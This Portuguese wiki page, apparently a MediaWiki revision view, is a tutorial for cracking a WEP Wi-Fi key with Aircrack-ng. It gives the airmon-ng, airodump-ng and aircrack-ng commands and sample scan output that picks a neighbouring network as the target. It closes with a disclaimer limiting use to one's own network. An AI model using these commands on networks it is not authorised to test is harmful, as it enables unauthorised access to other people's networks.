Aircrack - Tutorial WEP: mudanças entre as edições
Sem resumo de edição |
Sem resumo de edição |
||
Linha 40: | Linha 40: | ||
[[Category: aircrack]] | [[Category: aircrack]] | ||
[[ | [[Category: segurança]] | ||
[[Category: wifi]] | |||
[[Category: rede]] |
Edição atual tal como às 18h25min de 2 de maio de 2015
A partir daqui, consideramos que você já tenha um sistema com Aircrack-ng instalado e em funcionamento!
Instruções
Primeiro, vamos colocar nossa placa de wifi (wlan0) para monitorar (mon0):
airmon-ng start wlan0
Vamos ver quais redes existem por perto:
airodump-ng mon0
Um exemplo de saída:
CH 7 ][ BAT: 1 hour 19 mins ][ Elapsed: 48 s ][ 2012-03-05 17:37 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:0E:A1:56:04 -1 0 101 0 32 -1 WPA <length: 0> D8:5D:4C:AC:45:02 -88 23 0 0 1 54 . WPA2 CCMP PSK Bete 00:1D:0F:D1:E5:A2 -88 33 0 0 11 54 . WEP WEP Claudio 00:11:22:33:44:55 -88 106 1069 0 6 54 . WEP WEP FooBar 6C:FD:B9:29:19:84 -88 52 2 0 1 54e. WPA2 CCMP PSK Lalala 00:24:01:6E:F4:35 -88 31 2 0 11 54 . WEP WEP Xum 00:13:46:F0:EE:C8 -88 2 0 0 6 54 . WPA TKIP PSK Bzzz
Escolha uma com grande número de pacotes/segunds e com segurança WEP. No caso, escolhi FooBar. Anote o canal (6), o BSSID (00:11:22:33:44:55) e o ESSID (FooBar), vamos precisar disso.
Comece a capturar pacotes e gravá-los em um arquivo de log:
airodump-ng --channel 6 --bssid 00:11:22:33:44:55 -w arquivo_log mon0
Deixe um bom tempo esse comando rodando, para capturar o máximo de pacotes possível. Acima de uns 20 mil já está legal, pode tentar o comando abaixo:
aircrack-ng -b 00:11:22:33:44:55 arquivo_log*.cap
Se o aircrack conseguiu quebrar, ótimo. Senão, tente o comando para captura de pacotes até obter um número suficiente, até conseguir quebrar a chave.
- NAO NOS RESPONSABILIZAMOS PELO MAL USO DESSE TUTORIAL. ESTÁ AQUI PARA VOCÊ USAR PARA TESTAR SUA PRÓPRIA REDE WEP. ***